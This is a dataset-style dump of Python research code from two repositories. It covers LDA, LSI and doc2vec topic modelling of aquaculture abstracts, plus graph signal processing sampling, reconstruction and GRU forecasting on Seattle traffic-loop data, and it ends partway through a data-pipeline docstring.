repo_name stringclasses 400 values | branch_name stringclasses 4 values | file_content stringlengths 16 72.5k | language stringclasses 1 value | num_lines int64 1 1.66k | avg_line_length float64 6 85 | max_line_length int64 9 949 | path stringlengths 5 103 | alphanum_fraction float64 0.29 0.89 | alpha_fraction float64 0.27 0.89 |
|---|---|---|---|---|---|---|---|---|---|
rafunchik/shrimps | refs/heads/master | # coding=utf-8
from __future__ import print_function
import codecs
import os
import re
from gensim import corpora, matutils
from abstract import Abstract
import numpy
__author__ = 'rcastro'
from gensim.models import LdaModel, LsiModel, HdpModel
# model = Word2Vec.load_word2vec_format("/Users/rcastro/nltk_data/word2vec_models/GoogleNews-vectors-negative300.bin", binary=True)
# print(model.most_similar('Crayfish', topn=5))
import logging
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
print("get the abstracts")
text = ''
clean_abstracts_filename = 'clean_abstracts.txt'
if not os.path.isfile(clean_abstracts_filename):
try:
with codecs.open('abstracts.txt', 'r', encoding='utf8') as abstracts_file:
text = abstracts_file.read().strip()
except IOError as e:
print('Operation failed: %s' % e.strerror)
else:
pass # serialize the clean abstracts
abstracts = [Abstract(x) for x in text.split("\r\n\r\n")]
num_abstracts = len(abstracts)
clean_abstracts = [x.text for x in abstracts]
# stops = set(stopwords.words("english"))
#
# def get_tokens_list(my_text):
# words = [w for w in nltk.word_tokenize(my_text) if not w in stops]
# return words + [' '.join(x) for x in nltk.bigrams(words)]
def remove_numeric_tokens(string):
return re.sub(r'\d+[^\w|-]+', ' ', string)
# Initialize the "CountVectorizer" object, which is scikit-learn's
# bag of words tool.
# vectorizer = CountVectorizer(analyzer="word",
# tokenizer=None,
# preprocessor=remove_numeric_tokens,
# stop_words='english',
# lowercase=True,
# ngram_range=(1, 2),
# min_df=0,
# max_df=1.0, # quizas probar con 0.8 x ahi
# token_pattern=r"(?u)\b[\w][\w|-]+\b",
# max_features=155000)
# analyzer = vectorizer.build_analyzer()
#
# abstract_vectors = [analyzer(w) for w in clean_abstracts]
# TfidfTransformer() ->
#
# for i in xrange( 0, num_abstracts ):
# # If the index is evenly divisible by 1000, print a message
# if( (i+1)%1000 == 0 ):
# print "Review %d of %d\n" % ( i+1, num_abstracts )
# clean_abstracts.append( texts[i]) #review_to_words( texts[i] ))
# fit_transform() does two functions: First, it fits the model
# and learns the vocabulary; second, it transforms our training data
# into feature vectors. The input to fit_transform should be a list of
# strings.
# train_data_features = vectorizer.fit_transform(clean_abstracts)
#
# # Numpy arrays are easy to work with, so convert the result to an
# # array
# train_data_features = train_data_features.toarray()
# # Sum up the counts of each vocabulary word
# dist = np.sum(train_data_features, axis=0)
#
# # Take a look at the words in the vocabulary
# vocab = vectorizer.get_feature_names()
# For each, print the vocabulary word and the number of times it
# appears in the training set
# for tag, count in zip(vocab, dist):
# print count, tag
# print "Training the random forest..."
# from sklearn.ensemble import RandomForestClassifier
# Initialize a Random Forest classifier with 100 trees
# forest = RandomForestClassifier(n_estimators = 100)
# Fit the forest to the training set, using the bag of words as
# features and the sentiment labels as the response variable
#
# This may take a few minutes to run
# forest = forest.fit( train_data_features, train["sentiment"] )
from sklearn.feature_extraction.text import TfidfVectorizer
"""
Aqui vectorizamos el texto de los articulos usando TF/IDF quitando primero los tokens que son solo numericos,
y las stopwords en ingles.
Selecciona casi todos los unigramas y los bigramas de dos caracteres (donde el segundo caracter puede ser -) al menos
(en minusculas).
"""
vectorizer = TfidfVectorizer(analyzer="word",
tokenizer=None,
preprocessor=remove_numeric_tokens,
stop_words='english',
lowercase=True,
ngram_range=(1, 2),
min_df=1,
max_df=1.0, # se puede disminuir el umbral para ignorar terminos que aparecen en muchos docs
token_pattern=r"(?u)\b[\w][\w|-]+\b",
max_features=155000)
analyzer = vectorizer.build_analyzer()
abstract_vectors = [analyzer(w) for w in clean_abstracts]
tfidf_matrix = vectorizer.fit_transform(clean_abstracts)
terms = vectorizer.get_feature_names() # todos los terminos (unigramas y bigramas)
# dictionary = corpora.Dictionary(clean_abstracts)
#
#
# from sklearn.metrics.pairwise import cosine_similarity
#
# dist = 1 - cosine_similarity(tfidf_matrix)
from sklearn.cluster import KMeans
from sklearn.externals import joblib
num_clusters = 5 # numero predefinido de clusters, hay que probar en un rango
if not os.path.isfile('doc_cluster.pkl'): # carga del disco si lo corriste ya una vez, comentalo si lo quieres reescribir
km = KMeans(n_clusters=num_clusters) # kmeans usando cosine distance, agrupa los abstracts similares
km.fit(tfidf_matrix)
joblib.dump(km, 'doc_cluster.pkl')
else:
km = joblib.load('doc_cluster.pkl')
clusters = km.labels_.tolist()
import pandas as pd
article_titles = {'title': [x.title for x in abstracts], 'cluster': clusters}
frame = pd.DataFrame(article_titles, index=[clusters], columns=['title', 'cluster'])
print(frame['cluster'].value_counts())
print("Top terms per cluster:")
# sort cluster centers by proximity to centroid (usando cosine distance)
order_centroids = km.cluster_centers_.argsort()[:, ::-1]
for i in range(num_clusters):
print("Cluster %d words:" % i)
for ind in order_centroids[i, :7]: # replace 5 with n words per cluster
print(' %s' % terms[ind].encode('utf-8', 'ignore')) # las 7 palabras mas representativas de cada cluster
#
# print( "Cluster %d titles:" % i)
# for title in frame.ix[i]['title'].values.tolist()[:5]:
# print (' %s,' % title)
# create a Gensim dictionary from the texts
dictionary = corpora.Dictionary(abstract_vectors)
# remove extremes (similar to the min/max df step used when creating the tf-idf matrix)
dictionary.filter_extremes(no_below=1, no_above=0.8) # filtra los terminos mas comunes
#
corpus_filename = 'deerwester.mm'
if not os.path.isfile(corpus_filename):
# convert the dictionary to a bag of words corpus for reference
corpus = [dictionary.doc2bow(review) for review in abstract_vectors]
corpora.MmCorpus.serialize(corpus_filename, corpus)
else:
corpus = corpora.MmCorpus(corpus_filename)
# vamos a utilizar Latent semantic indexing para tratar categorizar los abstracts
print("lsi")
lsi_filename = 'model.lsi'
if not os.path.isfile(lsi_filename):
lsi = LsiModel(corpus, id2word=dictionary, num_topics=5) # initialize an LSI transformation, 5 topicos
#
lsi.save(lsi_filename) # same for tfidf, lda, ...
else:
lsi = LsiModel.load(lsi_filename)
lsi_topics = 5 # numero predefinido de topicos
def print_topic(lsi, topicno, topn=7):
"""
Return a single topic as a formatted string. See `show_topic()` for parameters.
>>> lsimodel.print_topic(topicno, topn)
'-0.340 * "category" + 0.298 * "$M$" + 0.183 * "algebra" + -0.174 * "functor" + -0.168 * "operator"'
"""
return ' + '.join(['%.3f*"%s"' % (v, k) for k, v in show_topic(lsi, topicno, topn)])
def show_topic(lsi, topicno, topn=7):
"""
Return a specified topic (=left singular vector), 0 <= `topicno` < `self.num_topics`,
as a string.
Return only the `topn` words which contribute the most to the direction
of the topic (both negative and positive).
>>> lsimodel.show_topic(topicno, topn)
[("category", -0.340), ("$M$", 0.298), ("algebra", 0.183), ("functor", -0.174), ("operator", -0.168)]
"""
# size of the projection matrix can actually be smaller than `self.num_topics`,
# if there were not enough factors (real rank of input matrix smaller than
# `self.num_topics`). in that case, return an empty string
if topicno >= len(lsi.projection.u.T):
return ''
c = numpy.asarray(lsi.projection.u.T[topicno, :]).flatten()
norm = numpy.sqrt(numpy.sum(numpy.dot(c, c)))
most = matutils.argsort(numpy.abs(c), topn, reverse=True)
return [(lsi.id2word[val], 1.0 * c[val] / norm) for val in most]
def show_topics(num_topics=lsi_topics, num_words=7, log=True, formatted=True, lsi=None):
"""
Return `num_topics` most significant topics (return all by default).
For each topic, show `num_words` most significant words (7 words by default).
The topics are returned as a list -- a list of strings if `formatted` is
True, or a list of `(word, probability)` 2-tuples if False.
If `log` is True, also output this result to log.
"""
shown = []
for i in xrange(min(num_topics, lsi.num_topics)):
if i < len(lsi.projection.s):
if formatted:
topic = print_topic(lsi, i, topn=num_words)
else:
topic = lsi.show_topic(i, topn=num_words)
shown.append((i, topic))
if log:
print("topic #%i(%.3f): %s", i, lsi.projection.s[i], topic)
return shown
show_topics(lsi=lsi) # imprime los topicos (categorias)
# try with BoW vectors too?
# vamos a utilizar Latent Dirichlet Allocation para tratar de categorizar los abstracts
# este se demora la primera q lo corres para entrenar el modelo
print("lda")
lda_filename = 'model.lda'
if not os.path.isfile(lda_filename):
lda = LdaModel(corpus, num_topics=5,
id2word=dictionary,
update_every=5,
chunksize=10000,
passes=100)
lda.save('/tmp/model.lda')
else:
lda = LdaModel.load('/tmp/model.lda')
lda.show_topics()
topics_matrix = lda.show_topics(formatted=False, num_words=7)
print(topics_matrix)
print(len(topics_matrix))
for topic in topics_matrix:
i = topic[1]
print([str(word) for word in i])
#
# topics_matrix = np.array(topics_matrix)
#
# topic_words = topics_matrix[:, :, 1]
# for i in topic_words:
# print([str(word) for word in i])
# otro modelo mas para categorizar documentos, Hierarchical Dirichlet Process
print("HDP")
model = HdpModel(corpus, id2word=dictionary)
model.show_topics(log=True, topics=5)
# ver https://radimrehurek.com/gensim/tut2.html
| Python | 310 | 33.645161 | 131 | /docs.py | 0.648138 | 0.635475 |
rafunchik/shrimps | refs/heads/master | # coding=utf-8
import os
import re
import numpy as np
from abstract import Abstract
__author__ = 'rcastro'
from gensim.models import Doc2Vec
from gensim.models.doc2vec import TaggedLineDocument, TaggedDocument
from codecs import open
def remove_numeric_tokens(string):
return re.sub(r'\d+[^\w|-]+', ' ', string)
# Convert text to lower-case and strip punctuation/symbols from words
def normalize_text(text):
norm_text = text.lower()
# control_chars = [chr(0x85)]
# for c in control_chars:
# norm_text = norm_text.replace(c, ' ') # Replace breaks with spaces
# norm_text = norm_text.replace('<br />', ' ')
# Pad punctuation with spaces on both sides
for char in ['.', '"', ',', '!', '?', ';', ':']:
norm_text = norm_text.replace(char, ' ' + char + ' ')
return norm_text
sentences_keywords = []
docs_filename = 'abstracts_preprocesados.txt'
if not os.path.isfile(docs_filename):
print "get the abstracts"
text = ''
try:
with open('abstracts.txt', 'r', encoding='utf8') as abstracts_file:
text = abstracts_file.read().strip()
except IOError as e:
print 'no pudo leer los abstracts: %s' % e.strerror
abstracts = [Abstract(x) for x in text.split("\r\n\r\n")]
for article in abstracts:
sentences_keywords.append([normalize_text(remove_numeric_tokens(x)).strip() for x in article.keywords])
with open(docs_filename, 'w', encoding='utf8') as f:
for idx, line in enumerate([normalize_text(remove_numeric_tokens(x.text)) for x in abstracts]):
f.write(line + '\n')
# # num_line = "_*{0} {1}\n".format(idx, line)
# # f.write(line+'\n')
sentences = TaggedLineDocument('abstracts_preprocesados.txt')
# sentences = sentences_keywords
# Vamos a utilizar Doc2vec, ver http://rare-technologies.com/doc2vec-tutorial/
from gensim.models import Doc2Vec
import gensim.models.doc2vec
from collections import OrderedDict
import multiprocessing
cores = multiprocessing.cpu_count()
assert gensim.models.doc2vec.FAST_VERSION > -1, "this will be painfully slow otherwise"
# Set values for various parameters
num_features = 400 # Word vector dimensionality
# min_word_count = 1 # Minimum word count
# context = 20 # Context window size
# downsampling = 1e-3 # Downsample setting for frequent words
# 3 modelos diferentes con veectores de 50 variables
simple_models = [
# PV-DM w/concatenation - window=10 (both sides) approximates paper's 10-word total window size
Doc2Vec(dm=1, dm_concat=1, size=50, window=10, negative=10, hs=0, min_count=2, workers=cores),
# PV-DBOW
Doc2Vec(dm=0, size=50, negative=5, hs=0, min_count=2, workers=cores),
# PV-DM w/average
Doc2Vec(dm=1, dm_mean=1, size=50, window=10, negative=5, hs=0, min_count=2, workers=cores),
]
# 3 modelos diferentes con veectores de 400 variables
simple_models_400 = [
# PV-DM w/concatenation - window=5 (both sides) approximates paper's 10-word total window size
Doc2Vec(dm=1, dm_concat=1, size=num_features, window=10, negative=10, hs=0, min_count=2, workers=cores),
# PV-DBOW
Doc2Vec(dm=0, size=num_features, negative=5, hs=0, min_count=2, workers=cores),
# PV-DM w/average
Doc2Vec(dm=1, dm_mean=1, size=num_features, window=10, negative=5, hs=0, min_count=2, workers=cores),
]
# speed setup by sharing results of 1st model's vocabulary scan
simple_models[0].build_vocab(sentences) # PV-DM/concat requires one special NULL word so it serves as template
print(simple_models[0])
for model in simple_models[1:]:
model.reset_from(simple_models[0])
print(model)
for model in simple_models_400:
model.reset_from(simple_models[0])
print(model)
all_models = simple_models+simple_models_400
models_by_name = OrderedDict((str(model), model) for model in all_models)
'''
Following the paper, we also evaluate models in pairs. These wrappers return the concatenation of the vectors from each model. (Only the singular models are trained.)
In [5]:
from gensim.test.test_doc2vec import ConcatenatedDoc2Vec
models_by_name['dbow+dmm'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[2]])
models_by_name['dbow+dmc'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[0]])
'''
from random import shuffle
import datetime
# for timing
from contextlib import contextmanager
from timeit import default_timer
import random
@contextmanager
def elapsed_timer():
start = default_timer()
elapser = lambda: default_timer() - start
yield lambda: elapser()
end = default_timer()
elapser = lambda: end-start
passes = 20
print("START %s" % datetime.datetime.now())
all_docs = []
for doc in sentences:
all_docs.append(doc)
for epoch in range(passes):
shuffle(all_docs) # shuffling gets best results
# doc_id = np.random.randint(len(sentences)) #
doc_id = np.random.randint(simple_models[0].docvecs.count) # pick random doc, (escoge un abstract aleatorio y busca los mas simijantes)
for name, model in models_by_name.items()[:3]:
with elapsed_timer() as elapsed:
model.train(all_docs)
# duration = '%.1f' % elapsed()
# print (name, duration)
sims = model.docvecs.most_similar(doc_id, topn=model.docvecs.count) # get *all* similar documents
print(u'ABSTRACTS mas similares por modelo %s:\n' % model)
print(u'abstract escogido: «%s»\n' % (' '.join(all_docs[doc_id].words)))
print(u'y sus keywords: «%s»\n' % (' '.join(sentences_keywords[doc_id])))
for label, index in [('MOST', 0)]: #, ('MEDIAN', len(sims)//2), ('LEAST', len(sims) - 1)]:
print(u'%s %s: «%s»\n' % (label, sims[index][1], ' '.join(all_docs[sims[index][0]].words)))
print(u'Keywords de los docs similares: «%s»\n' % (' '.join(sentences_keywords[sims[index][0]])))
word_models = all_models[:3]
# while True:
# word = random.choice(word_models[0].index2word)
# if word_models[0].vocab[word].count > 10 and len(word)>3:
# break
# aqui puedes sustituir por una palabra, y ver que palabras similares te salen de acuerdo a los modelos...
word = "aquaculture" #diadromous
similars_per_model = [str(model.most_similar(word, topn=5)).replace('), ','),<br>\n') for model in word_models]
similar_table = ("<table><tr><th>" +
"</th><th>".join([str(model) for model in word_models]) +
"</th></tr><tr><td>" +
"</td><td>".join(similars_per_model) +
"</td></tr></table>")
print("most similar words for '%s' (%d occurences)" % (word, simple_models[0].vocab[word].count))
print(similar_table)
#TODO import wiki model and add to word_models
| Python | 175 | 36.965714 | 166 | /doc2vec.py | 0.671433 | 0.651565 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import torch
import torch.nn as nn
import numpy as np
from torch.autograd import Variable
import scipy
from sklearn.metrics.pairwise import rbf_kernel
def complement(S,N):
V = set(np.arange(0,N,1))
return np.array(list(V-set(S)))
class Reconstruction(nn.Module):
def __init__(self,V, sample, freqs, domain='vertex',use_original_set = False, device = 'cuda'):
"""
GSP reconstruction of Graph signals
Args:
V (numpy array): eigenvector matrix of Laplacian or adjacency. This matrix is expected to be orthonormal.
sample (list-like): list of indices of in-sample nodes
freqs (list): number of list of indices of
domain (str, optional): [description]. domain of the graph signal. Options are vertex or spectral'. Defaults to 'vertex'.
use_original_set (bool, optional): [description]. Defaults to False.
"""
super(Reconstruction, self).__init__()
assert(domain in ['vertex','spectral'])
if domain == 'vertex':
interp = Interpolator(V, sample, freqs)
elif domain == 'spectral':
interp= Interpolator(V, sample, freqs, freq=True)
self.Interp = torch.Tensor(interp).to(device)
self.N = V.shape[0]
if use_original_set:
self.sample = sample
else:
self.sample = None
def forward(self,x):
x0 = x
n_dim = len(x.size())
if n_dim == 3:
bz, seq_len, n = x.size()
x = x.T
x = x.reshape((n, bz*seq_len))
x = torch.matmul(self.Interp,x)
x = x.reshape((self.N,seq_len,bz)).T
else:
bz, n = x.size()
x = x.T
x = x.reshape((n, bz))
x = torch.matmul(self.Interp,x)
x = x.reshape((self.N,bz)).T
return x
def corrMatrix(A, x):
"""
corrMatrix compute an adjacency matrix with radial basis function entries
Args:
A (2D numpy array): adjacency matrix
x (2D numpy array): signals to be used to compute correlations
Returns:
2D numpy array: adjacency matrix
"""
cor = rbf_kernel(x.T/10)
A = cor*(A)
e, _ = np.linalg.eigh(A)
A/=np.max(e)
return A-np.diag(A.diagonal())
def spectral_components(A, x, return_vectors = True,lap = True, norm = False):
"""
spectral_components: compute the index of spectral components with largest magnitude in a set of graph signals
Args:
A (2d numpy array): adjacency matrix
x (2d numpy array): graph signals with time in the rows and nodes in the columns
return_vectors (bool, optional): [description]. Defaults to True.
lap (bool, optional): If it is the spectral components are computed using the laplacian. Defaults to True.
norm (bool, optional): [description]. If the matrix should be normalized as $D^{-1/2}AD^{-1/2}$.
Returns:
[type]: [description]
"""
if lap:
if norm:
d = 1/np.sqrt(A.sum(axis=1))
D=np.diag(d)
I = np.diag(np.ones(A.shape[0]))
L = I - D@A@D
else:
D = np.diag(A.sum(axis=1))
L = D - A
else:
if norm:
d = 1/np.sqrt(A.sum(axis=1))
D=np.diag(d)
I = np.diag(np.ones(A.shape[0]))
L = D@A@D
else: L = A
lambdas, V = np.linalg.eigh(L)
energy = np.abs(V.T@x.T).T
index = []
for y in energy:
index.append(list(np.argsort(y)))
ocorrencias = {i:0 for i in range(x.shape[1]) }
for y in index:
for i in y:
ocorrencias[i]+= y.index(i)
F_global= np.argsort([ocorrencias[oc] for oc in ocorrencias])[::-1]
if return_vectors:
return F_global, V
else:
return F_global
def Interpolator(V, sample, freqs, freq = False):
Vf = V[:,freqs]
Psi = np.zeros(Vf.shape[0])
Psi[sample] = 1 #transpose of the sampling operator \Psi
Psi = np.diag(Psi)
I = np.identity(Vf.shape[0])
inv = scipy.linalg.inv(Vf.T@Psi@Vf)
if freq == False:
pseudoi = inv@Vf.T@Psi[:, sample]
else:
pseudoi = inv
interp = np.dot(Vf, pseudoi)
Psi_bar = I - Psi
s = np.linalg.svd(np.dot(Psi_bar, Vf), compute_uv=False)
if np.max(s)>1:
print("Samling is not admissable")
return None
return interp
class KNN(nn.Module):
def __init__(self,A,sample, matrix):
super(KNN,self).__init__()
N = A.shape[0]
self.unknown = complement(sample,N)
self.mask = np.mean(matrix.values[:,sample])
def forward(self, input):
if len(input.size()) == 2:
input[:,self.unknown] = self.mask
elif len(input.size()) == 3:
input[:,:,self.unknown] = self.mask
elif len(input.size()) == 4:
input[:,:,:,self.unknown] = self.mask
x = input
for node in self.unknown:
neighbors = np.nonzero(A[node])[0]
x[:,:,[node]] = torch.mean(x[:,:, neighbors], dim=-1)
return x
def greedy_e_opt(Uf, S):
"""
code from https://github.com/georgosgeorgos/GraphSignalProcessing, please refer to this repository
MIT License
Copyright (c) 2018 Giorgio Giannone
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
greedy_e_opt: sample S nodes from a set of size N where N is the number of rows in matrix Uf
Args:
Uf (2D numpy array): truncated eigenvector matrix with N rows. Columns correspond to the selected eigenvectors
S (int): sample size
Returns:
sample: list of indices of selected nodes
"""
index_set = set()
sample=[]
n = Uf.shape[0] - 1
k = 0
I = np.diag(np.ones(Uf.shape[0]))
while len(index_set) < S:
i = -1
i_best = -1
old_list = []
sigma_best = np.inf
while i < n:
i = i + 1
if i in index_set:
continue
else:
Ds_list = np.zeros(Uf.shape[0])
ix = sample + [i]
Ds_list[ix] = 1
Ds = np.diag(Ds_list)
Ds_bar = I - Ds
DU = np.dot(Ds_bar, Uf)
s = np.linalg.svd(DU, compute_uv=False)
sigma_max = max(s)
if sigma_max < sigma_best and sigma_max != -np.inf:
sigma_best = sigma_max
i_best = i
k = k + 1
index_set.add(i_best)
sample.append(i_best)
return sample
| Python | 256 | 29.402344 | 133 | /pytorch_gsp/utils/gsp.py | 0.561866 | 0.555313 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import math
import sys
import time
import numpy as np
import pandas as pd
from sklearn.metrics.pairwise import rbf_kernel
def USA_data(directory ):
""""TODO: include the GSOD dataset"""
signals = pd.read_csv( directory + 'Usa_temp.csv')
if "Unnamed: 0" in signals.columns:
signals.drop(columns="Unnamed: 0", inplace = True)
A = np.load( directory + 'Adjk10_07-13.npy')
return signals, A
def Seattle_data(directory , binary=False):
"""
Seattle_data:
https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb
Args:
directory (str): directory of the seattle loop detector dataset
binary (bool, optional): I the matrix should be binary or the RBF kernel should
be used on the . Defaults to False.
Returns:
speed_matrix: graph signals with time in the rows and nodes in the columns
A: adjacency matrix
FFR: free flow reachability matrices
"""
speed_matrix = pd.read_pickle( directory + 'speed_matrix_2015',)
A = np.load( directory + 'Loop_Seattle_2015_A.npy')
if not binary:
cor = rbf_kernel(speed_matrix[:1000].T/10)
A = cor*(A)
e, V = np.linalg.eigh(A)
A/=np.max(e)
A = A-np.diag(A.diagonal())
FFR_5min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_5min.npy')
FFR_10min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_10min.npy')
FFR_15min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_15min.npy')
FFR_20min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_20min.npy')
FFR_25min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_25min.npy')
FFR = [FFR_5min, FFR_10min, FFR_15min, FFR_20min, FFR_25min]
return speed_matrix, A, FFR
| Python | 52 | 35.01923 | 111 | /data/Load_data.py | 0.657797 | 0.61735 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import os
import time
import torch
import argparse
import numpy as np
import pandas as pd
import time
from data.Load_data import Seattle_data
from data.Dataloader import *
from pytorch_gsp.train.train_rnn import Evaluate, Train
from pytorch_gsp.utils.gsp import ( greedy_e_opt, spectral_components)
from pytorch_gsp.models.sggru import *
def n_params(model):
params=[]
for param in model.parameters():
params.append(param.numel())
return np.sum(params)
print(torch.__version__)
def training_routine(args):
device = 'cuda' if torch.cuda.is_available else 'cpu'
if args.device == 'cuda' and device == 'cpu':
print("cuda is not available, device set to cpu")
else:
assert (args.device in ['cpu','cuda'])
device = args.device
lr = args.lr
epochs = args.epochs
seq_len = args.seq_len
pred_len = args.pred_len
patience = args.patience
name = args.save_name
speed_matrix, A, FFR = Seattle_data('data/Seattle_Loop_Dataset/') #put seattle Loop dataset in this directory
N = speed_matrix.shape[1]
S = int(args.sample_perc*N/100)
if args.F_perc is None:
F = int(S/3)
else:
F = int(args.F_perc*N/100)
assert(S>F) # the sampling set must be larger than the spectral support
#compute gft
F_list, V = spectral_components(A,np.array(speed_matrix)[:1000] )
if args.supervised:
freqs = F_list[:F]
else:
freqs = np.arange(0,F,1)
if args.e_opt:
print("Using e-optimal greedy algorithm")
if args.sample_perc == 25:
sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt25.npy')[0]
elif args.sample_perc == 50:
sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt50.npy')[0]
elif args.sample_perc == 75:
sample = np.load( 'data/Seattle_Loop_Dataset/sample_opt75.npy')[0]
else:
sample = greedy_e_opt(V[:,Fs],S)
else: sample = np.sort(np.random.choice(np.arange(N), S, replace = False))
S = len(sample)
pre_time = time.time()
train, valid, test,max_value = SplitData(speed_matrix.values, label = None, seq_len = 10,
pred_len = 1, train_proportion = 0.7,
valid_proportion = 0.2, shuffle = False)
pipeline = DataPipeline(sample,V,freqs,seq_len,pred_len)
train_dataloader = pipeline.fit(train)
valid_dataloader = pipeline.transform(valid)
test_dataloader = pipeline.transform(test,sample_label=False,batch_size = test.shape[0]-seq_len-pred_len,shuffle=False)
print("Preprocessing time:", time.time()-pre_time)
layer = SpectralGraphForecast(V, sample,freqs, rnn = 'gru')
if args.supervised:
sggru = model(V,sample,freqs, layer,l1=0,l2=0.0,supervised = True).to(device)
else:
sggru = model(V,sample,freqs, layer,l1=0,l2=0.0,supervised = False).to(device)
pre_time = time.time()
print("Total number of nodes: {}".format(N))
print("Sample size: {}".format(S))
print("Spectral sample size: {}".format(F))
print("Initial learning rate: {}".format(lr))
sggru,sggru_loss= Train(sggru ,train_dataloader, valid_dataloader, epochs = epochs,
learning_rate = lr,patience=patience ,sample = sample)
print("Training time:", time.time()-pre_time)
pre_time = time.time()
sggru_test = Evaluate(sggru.to(device), test_dataloader, max_value )
print("Test time:", time.time()-pre_time)
name = 'sggru'
loss = (sggru_loss,sggru_test)
os.makedirs("models_and_losses/", exist_ok=True)
torch.save(sggru, "models_and_losses/{}.pt".format(name))
np.save("models_and_losses/{}.npy".format(name),loss)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Semi-Supervised Prediction\n SeattleLoop dataset \n download link: https://github.com/zhiyongc/Seattle-Loop-Data ')
parser.add_argument('--epochs', type=int, default = 100, help='maximum number of epochs before stopping training')
parser.add_argument('--lr', type=float, default = 1e-4, help='starting learn rate' )
parser.add_argument('--patience', type=int, default = 10, help='number of consecutive non-improving validation loss epochs before stop training')
parser.add_argument('--sample-perc', type=int, default = 50, help='percentage of in-sample nodes')
parser.add_argument('--F-perc', type=int, default = None, help='percentage of frequencies to keep in frequency set \mathcal{F}')
parser.add_argument('--S-perc', type=int, default = 50, help='percentage of samples')
parser.add_argument('--e-opt', action='store_true',help='if sampling is performed by E-optmal greedy algorithm')
parser.add_argument('--sample-seed',type=int,default=1, help='number of run with uniformely random samples. Only used if --e-opt is False')
parser.add_argument('--seq-len', type=int,default=10, help='history length')
parser.add_argument('--pred-len', type=int,default=1, help='prediction horizon')
parser.add_argument('--save-name', type=str, default='sggru_S50_F53_opt_pred1', help='name of file')
parser.add_argument('--supervised', action='store_true', help='if training is supervised or semi-supervised. Deafault is semi-supervised')
parser.add_argument('--device', type=str, default='cuda', help='devices: cuda or cpu')
args = parser.parse_args()
training_routine(args)
| Python | 135 | 40.148148 | 165 | /main/seattle_train_sggru_semisupervised.py | 0.645068 | 0.633009 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master |
import time
import numpy as np
import pandas as pd
import torch
import torch.utils.data as utils
from pytorch_gsp.utils.gsp import complement
def PrepareSequence(data, seq_len = 10, pred_len = 1):
time_len = data.shape[0]
sequences, labels = [], []
for i in range(time_len - seq_len - pred_len):
sequences.append(data[i:i+seq_len])
labels.append(data[i+seq_len+pred_len-1:i+seq_len+pred_len])
return np.asarray(sequences), np.asarray(labels)
def SplitData(data, label = None, seq_len = 10, pred_len = 1, train_proportion = 0.7,
valid_proportion = 0.2, shuffle = False):
max_value = np.max(data)
data /= max_value
samp_size = data.shape[0]
if label is not None:
assert(label.shape[0] == samp_size)
index = np.arange(samp_size, dtype = int)
train_index = int(np.floor(samp_size * train_proportion))
valid_index = int(np.floor(samp_size * ( train_proportion + valid_proportion)))
if label is not None:
train_data, train_label = data[:train_index+pred_len-1], label[:train_index+pred_len-1]
valid_data, valid_label = data[train_index-seq_len:valid_index+pred_len-1], label[train_index-seq_len:valid_index+pred_len-1]
test_data, test_label = data[valid_index-seq_len:], label[valid_index-seq_len:]
return (train_data, train_label), (valid_data, valid_label), (test_data, test_label), max_value
else:
train_data = data[:train_index+pred_len-1]
valid_data = data[train_index-seq_len:valid_index+pred_len-1]
test_data = data[valid_index-seq_len:]
return train_data ,valid_data, test_data, max_value
def Dataloader(data, label, batch_size = 40, suffle = False):
data, label = torch.Tensor(data), torch.Tensor(label )
dataset = utils.TensorDataset(data, label)
dataloader = utils.DataLoader(dataset, batch_size = batch_size, shuffle=suffle, drop_last = True)
return dataloader
def Preprocessing_hop_interp(matrix, A ,sample):
unknown = complement(sample,matrix.shape[1])
features_unknown = np.copy(matrix.values)
features_unknown[:,unknown] = np.mean(matrix.values[:100,sample])
for node in unknown:
neighbors = np.nonzero(A[node])[0]
for t in range(features_unknown.shape[0]):
features_unknown[np.array([t]), np.array([node])] = np.mean(features_unknown[t, neighbors])
return features_unknown
def MaxScaler(data):
max_value = np.max(data)
return max_value, data/max_value
def Preprocessing_GFT(matrix,sample, V , freqs ):
x = matrix.T
Vf = V[:, freqs]
Psi = np.zeros((V.shape[0],x.shape[1]))
Psi[sample] = x
Tx = (Vf.T@Psi).T
return Tx
class DataPipeline:
def __init__(self, sample, V , freqs ,seq_len, pred_len, gft = True):
"""
DataPipeline: perform the sampling procedure on the graph signals and create the dataloader object
Args:
sample (np array): list of graph indices
V (2D np array): Laplacian eigenvector matrix
freqs (np array): list of frequency indices
seq_len (int, optional): size of historical data. Defaults to 10.
pred_len (int, optional): number of future samples. Defaults to 1.
gft (bool, optional): if Fourier transform should be applied. Defaults to False.
"""
self.sample = sample
self.V = V
self.freqs = freqs
self.seq_len = seq_len
self.pred_len = pred_len
self.gft = gft
def fit(self,train_data,sample_label = True, batch_size=40, shuffle=True):
"""
